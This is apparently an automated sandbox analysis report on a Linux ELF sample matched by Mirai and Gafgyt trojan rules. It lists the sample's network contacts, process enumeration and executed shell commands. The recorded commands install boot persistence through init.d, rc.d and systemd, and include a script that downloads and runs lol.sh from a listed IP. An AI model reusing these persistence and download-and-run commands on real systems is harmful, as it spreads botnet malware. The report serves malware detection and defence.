Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.125.190.26 |
Source: x86_32.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.dr |
String found in binary or memory: http://94.156.227.233/ |
Source: x86_32.nn.elf, 5432.1.00000000ffe42000.00000000ffe63000.rw-.sdmp |
String found in binary or memory: http://94.156.227.233/lol.sh |
Source: x86_32.nn.elf |
String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5263/cmdline |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5520/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5521/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5519/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5511/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5599/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5610/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5512/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5513/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5514/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/319/cmdline |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5515/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5537/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5516/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5517/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5518/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5595/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5596/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5597/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5510/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5598/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5508/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5607/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/1/cmdline |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5509/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5608/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5609/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5522/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5523/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5600/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5524/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5601/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5503/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5525/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5602/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5526/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5603/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5527/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5604/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5605/status |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5606/status |
Source: /tmp/x86_32.nn.elf (PID: 5449) |
Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1" |
Source: /tmp/x86_32.nn.elf (PID: 5471) |
Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" |
Source: /tmp/x86_32.nn.elf (PID: 5473) |
Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" |
Source: /tmp/x86_32.nn.elf (PID: 5475) |
Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh" |
Source: /tmp/x86_32.nn.elf (PID: 5476) |
Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1" |
Source: /tmp/x86_32.nn.elf (PID: 5478) |
Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
Source: /tmp/x86_32.nn.elf (PID: 5480) |
Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1" |